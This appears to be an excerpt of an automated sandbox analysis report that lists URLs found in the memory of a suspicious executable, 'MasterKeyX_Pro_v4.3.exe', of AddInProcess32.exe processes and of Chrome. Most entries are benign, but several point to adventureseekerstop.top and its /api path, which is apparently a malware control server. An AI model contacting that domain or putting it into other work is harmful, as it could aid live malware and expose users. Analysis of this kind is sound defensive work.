Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6041
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6048
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6141
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6248
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6439
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6651
Source: chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6651H
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6692
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6755
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6860
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6876
Source: chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/68763
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6878
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6929
Source: chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6929G
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/6953
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7036
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7047
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7172
Source: chrome.exe, 0000000A.00000002.2801537620.000040CC00484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7279
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7370
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7406
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7488
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7553
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7556
Source: chrome.exe, 0000000A.00000002.2801537620.000040CC00484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7724
Source: chrome.exe, 0000000A.00000002.2801537620.000040CC00484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7760
Source: chrome.exe, 0000000A.00000002.2801537620.000040CC00484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/7761
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8162M
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8215Q
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/82296
Source: chrome.exe, 0000000A.00000002.2801537620.000040CC00484000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2799512797.000040CC0000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 0000000A.00000002.2799512797.000040CC0000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anglebug.com/8280pP
Source: chrome.exe, 0000000A.00000003.2728078493.000040CC0034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2730795861.000040CC0034C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2800810269.000040CC0034C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 0000000A.00000002.2799927782.000040CC000EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
Source: chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2806360791.000040CC00C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 0000000A.00000003.2733645260.000040CC01060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733735494.000040CC00FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733825712.000040CC0107C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://jsbin.com/temexa/4.
Source: chrome.exe, 0000000A.00000003.2733645260.000040CC01060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2734714270.000040CC00CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733699258.000040CC010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733735494.000040CC00FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733825712.000040CC0107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2735055489.000040CC00304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2734756219.000040CC00744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 0000000A.00000003.2733645260.000040CC01060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2734714270.000040CC00CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733699258.000040CC010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733735494.000040CC00FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733825712.000040CC0107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2735055489.000040CC00304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2734756219.000040CC00744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 0000000A.00000003.2733645260.000040CC01060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2734714270.000040CC00CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733699258.000040CC010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733735494.000040CC00FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733825712.000040CC0107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2735055489.000040CC00304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2734756219.000040CC00744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 0000000A.00000003.2733645260.000040CC01060000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2734714270.000040CC00CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733699258.000040CC010B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733735494.000040CC00FA8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2733825712.000040CC0107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2735055489.000040CC00304000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2734756219.000040CC00744000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: AddInProcess32.exe, 00000005.00000002.2726098890.000000000A7A2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://purl.oen
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2612742813.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2688799490.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 0000000A.00000002.2804752031.000040CC009D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 0000000A.00000002.2804752031.000040CC009D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://unisolated.invalid/a
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: MasterKeyX_Pro_v4.3.exe, 00000000.00000002.2648055762.000000000BD02000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: AddInProcess32.exe, 00000007.00000002.2913344037.0000000003D4D000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2803365719.000040CC007E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 0000000A.00000002.2801481792.000040CC00428000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 0000000A.00000002.2799512797.000040CC0000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 0000000A.00000002.2800360268.000040CC001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 0000000A.00000002.2800360268.000040CC001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 0000000A.00000002.2800360268.000040CC001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout1
Source: chrome.exe, 0000000A.00000002.2800360268.000040CC001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 0000000A.00000002.2800360268.000040CC001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 0000000A.00000002.2800433883.000040CC0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: AddInProcess32.exe, 00000008.00000002.2807435042.0000000001653000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.2808739822.00000000039E3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://adventureseekerstop.top/
Source: AddInProcess32.exe, 00000008.00000002.2807435042.0000000001653000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://adventureseekerstop.top/Z
Source: AddInProcess32.exe, 00000008.00000002.2808888555.00000000039F3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.2807323238.0000000001640000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.2806282733.00000000015D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://adventureseekerstop.top/api
Source: AddInProcess32.exe, 00000008.00000002.2807323238.0000000001640000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://adventureseekerstop.top/apiQ
Source: AddInProcess32.exe, 00000008.00000002.2808888555.00000000039F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://adventureseekerstop.top/apik
Source: AddInProcess32.exe, 00000008.00000002.2808888555.00000000039F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://adventureseekerstop.top/apikq
Source: AddInProcess32.exe, 00000008.00000002.2807435042.0000000001653000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://adventureseekerstop.top/le
Source: AddInProcess32.exe, 00000008.00000002.2807435042.0000000001653000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://adventureseekerstop.top/pif
Source: AddInProcess32.exe, 00000008.00000002.2806282733.00000000015D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://adventureseekerstop.top:443/api
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 0000000A.00000003.2723921834.000040CC003E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.2728344508.000040CC007D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 0000000A.00000002.2805726103.000040CC00BC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308J
